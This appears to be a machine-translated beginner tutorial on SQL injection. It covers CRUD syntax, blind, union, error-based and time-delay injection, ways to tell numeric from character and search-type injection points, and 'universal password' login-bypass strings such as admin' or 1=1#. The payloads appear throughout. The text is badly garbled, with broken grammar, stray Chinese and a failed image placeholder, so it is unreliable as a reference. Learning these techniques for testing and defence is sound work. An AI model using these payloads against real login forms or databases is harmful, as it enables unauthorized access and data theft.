Mainly to see the next levixxxx write so profound things, and then look at their own point of feeling low, not easy to understand, so I decided to. . .
First of all, understand CRUD
Library table should not have to explain it.
1.insert into library table (column 1, row 2 ...) values (value 1, value 2)
insert into 1.news values(3,’test’,’test’,’3’)
- String remember to use single quotes, the value is not
. 2.select row 1, column 2 from database table (column 1, column 2 ...) - ( "*" stands for all the column)
- limit - Syntax: limit (starting subscript, article number) generally follows the end of the statement
- select * from database tables - Query All
- select id, title from the library table - the query "id" and "title" column
3.delete from the library table where id = 3 -. Delete "id = 3" that column
4.update library. Table 1 Column = set value, the column value condition 2 =
type = '2' where id = 2 - the "id = 2" in the "type" to 2
The most basic query
select * from 1.news where username='admin' and password='test'
select * from 1.news where username=' ' or ' '=' ' and password='test'
select * from 1.news where username= ' ' or 1=1#' and password='test'
- "- and # is the comment character, comment out the contents of the back."
- As long as the line through the logic, pay attention to the closing parenthesis, single quote closed, pay attention now - source code provided - have closed in
- Master password a 'or' a '=' a
- Adhesive back data that would otherwise not get the data can be bonded in the data: the role of the union (will be mentioned later, clever use of relatively volatile)
- order by (also mentioned later): the column used in determining
SQL injection primary
What is sql injection:
Parameter submitted by the user contains some characters into the attack with sql database queries, thus changing the semantics of data you want to get some
- Anywhere possible sql injection, such as referer, cookie, body, URL, etc.
[pictures of foreign chains dump fails, the source station may have a security chain mechanism, it is recommended to save the picture down directly upload (img-qqDWDcKd-1585889714798) ( / Common injection tool .png)]
What type sql injection (injection manner is not the same as access to data classified):
1. Blind: according to the true and false logic to determine
- Principle : By ascii code, does not support Chinese, converted to ascii code by comparing the size of the characters taken substr function, determines the size of the dichotomy, then converted to ascii code data, using Chinese hex function (the MySQL): Chinese convert to hexadecimal then converted
2.union Injection: directly through the union query to display the page, such as:
union select username from admin
3. Error displaying injection: the use of a database error messages were injected, plus a " '" error message is displayed, observe error messages or error messages like - (who need to inject a very high level, anyway, I can not ...)
4. Delay Injection: response time is determined by the sleep function page
sql injection can do:
1. Obtain (CRUD) database file
2. Reading and Writing Files
3. execute operating system commands
How to determine whether there is access:
Digital, character, search type
A very important table, you must keep in mind: information_schema.tables
function exists is determined whether a table exists:
exists(select 1 form information_schema.tables)
1. Numeric:
-
true and false is false, true or false is true
sql=“select * from news where id=1 and 1=1” sql=”select * from news where id=1 order by 1“
-
With the order by judge how many columns (by a few is the first of several columns, if the display is present, it does not show that this column does not exist, in order to determine usage above) and then union, some programmers will write the order by itself, there will xxxxxx order by order by xxxx situation, it will display a syntax error and so on, so everything to the actual subject.
-
Some table query shows only the first data, so the front should Negatives:? Such as id = 1 and 1 = 2
-
Some use of the union below
2. Character:
sql=“select * from news where type=‘ xxx ’ “
sql=”select * from news where type=‘1’ and ‘1’=‘1’ ”
In addition to before and after the need to construct a grammar, with other digital type are the same. (Excess can be commented 'with #)
is determined by a number or character of the method: the first type is configured in accordance with the digital
Pseudo-static injection:
500 404 but is not given, the error message sql
method of injection position after 1.html 1, the same token, determines a number or a character, a super sql injection tool markings injection
2. For example, the method turned out to be asd111.html, this time you can try to construct asd.php? Id = 111 or asd.asp? Id = 111, etc.
3. Remove method to see if normal .html
3. Search Type:
- You must choose a keyword data, otherwise no matter how the results will not appear structure
select * from news where title like ‘ %xxxx% ’
- headline appeared in the middle of this character, fuzzy queries
select * from news where title like ‘ xxxx% ’
- start with xxx, ending with any character
select * from news where title like ‘ %xxxx ’
- at the beginning of any character, ending xxx
to close by syntax itself, because the middle is empty %% characters, so all will be displayed.
Because it is submitted by post, so you can comment directly #, if get, to be url encoded, converted to% 23 #.
Universal Password:
select * from 1.news where username='admin'or 1=1# and password=''
Prior to learn to look at this very simple, looks at the situation constructed on it, usually do not know know admin password.
-
admin’ or ‘a’='a
-
admin’ or 1=1#(mysql)
-
admin’ or 1=1- -(sqlserver)
-
admin 'or 1 = 1; - - (sqlserver) ";" statement represents a multi-
front or a condition, followed by a condition, it may not know the account password. -
Usually super SQL injection tool, modification request packet, with the use of capture.
or 1=1#(mysql)
admin' or 1=1--(sqlserver)
admin' or 1=1;--(sqlserver) # " ; "表示多语句
Is a front or condition, followed by a condition, it can not know the account password.
- Usually super SQL injection tool, modification request packet, with the use of capture.